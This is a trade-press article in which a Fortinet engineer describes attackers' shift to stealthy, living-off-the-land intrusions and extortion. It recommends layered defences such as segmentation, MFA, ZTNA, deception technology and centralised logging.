Cybercriminals are transitioning from a “smash ‘n grab” approach to a stealthier strategy. They now spend more time comprehending victim environments, extracting a greater amount of data, and aiming to maximise their profits per attack.
This shift indicates cybercrime has become increasingly sophisticated and potentially more harmful, says Dale de Kok, systems engineer at Fortinet Southern Africa. “In the past, cybercrime was like a quick theft on the street, where a robber would snatch your bag from your car and flee. Nowadays, they also take your car, address, and house keys – for a robbery of higher value.”
De Kok says one reason attackers have adapted their methods is that organisations have become better at backing up their information. “Attackers know defenders have better backups, so they moved to extortion and stealthy lateral movement to access more of the environment. If they exfiltrate the data of every system or move to EXSI or hypervisor servers and encrypt the entire environment, they could cripple you. They are finding ways to guarantee you will pay.
“The longer they are inside your organisation, the higher the cost to remediate that. After six months, you might have to scrap the entire environment and build it again from scratch,” he says.
To hide in plain sight, attackers are increasingly “living off the land” to camouflage themselves. They utilise legitimate business software to blend in, explains De Kok. “Once they gain initial access through compromised endpoints or email, they rely on embedded applications like PowerShell or DLL files for lateral movement. This allows them to download payloads from the internet and directly inject them into memory.”
Detecting the use of these embedded apps and binaries, which are part of the operating system, has become more challenging. While increased monitoring can help identify anomalous behaviour in such attacks, it also leads to a higher volume of noise being generated.
Layered risk mitigation
Mitigating risk in the ever-evolving cyber-security landscape requires a layered approach, says De Kok. “Enhanced cyber security primarily relies on achieving comprehensive visibility. It is crucial to clearly understand your environment, including the devices present, potential vulnerabilities, and critical security checkpoints to effectively apply protective measures.”
Organisations must possess the capability to track attackers’ progression through the various stages of the kill chain to find out if any exposure has already occurred. For this, reliance on threat intelligence vendors and digital protection services becomes imperative. These services monitor the dark web for any indications of access or data from your environment being sold, providing valuable insights for proactive defence.
De Kok highlights key security measures that are essential for safeguarding systems. These measures include securing external-facing systems, implementing network segmentation, enabling multi-factor authentication, and embarking on a journey towards Zero Trust Network Access (ZTNA).
“By adopting ZTNA, organisations can ensure that only authorised individuals with the appropriate security posture can access the network. It allows for the identification of devices attempting to access systems and applications, enabling the application of dynamic security controls to ensure proper protection,” he says.
“To tackle the more sophisticated reconnaissance conducted by attackers, organisations need to use deception technologies such as FortiDeceptor. These technologies involve deploying fake Windows servers or business applications that appear genuine, enticing attackers. This triggers alerts, providing early warning signs,” he explains. “Deception offers a straightforward and cost-effective solution. It uses automation to react to high fidelity alerts and takes compromised devices off the network.”
Quick wins
While multi-layered security and ZTNA are important security goals, achieving these are long-term projects. “You can’t just flick a switch and turn on ZTNA. Achieving it is a lengthy process that doesn’t happen overnight. However, there are some ‘quick wins’ that can immediately improve your security posture and contribute to your broader cyber security objectives.”
Centralised logging is probably one of the easiest quick wins. It also helps you build up the asset register, get a view of the environment, and generate data necessary for incident response if you get hacked. It’s also a fairly passive rollout compared to endpoint solutions and ZTNA, which take planning and can have friction points, he says.
Overall, implementing the right security measures and leveraging deception technologies can significantly enhance an organisation’s defence against cyber threats.